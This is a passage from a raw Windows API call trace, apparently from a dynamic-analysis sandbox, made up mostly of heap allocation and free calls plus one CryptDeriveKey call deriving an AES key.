0x43e2750 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0079.532] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.532] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb030 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0079.532] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.532] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0079.533] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caee0 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0079.533] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0079.533] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.534] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.534] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0079.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43cb030 [0079.535] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb030, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.535] CryptDeriveKey (in: hProv=0x41a4728, Algid=0x6610, hBaseData=0x41abfc0, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac2c0) returned 1 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.535] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.535] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.536] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0079.536] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.538] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0079.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0079.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0079.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0079.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0079.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0079.539] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0079.539] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0079.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.539] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0079.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0079.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0079.539] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0079.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb078 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caf28 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae38 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafe8 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae50 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafa0 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cafd0 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae68 [0079.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0079.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae80 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae98 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caeb0 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 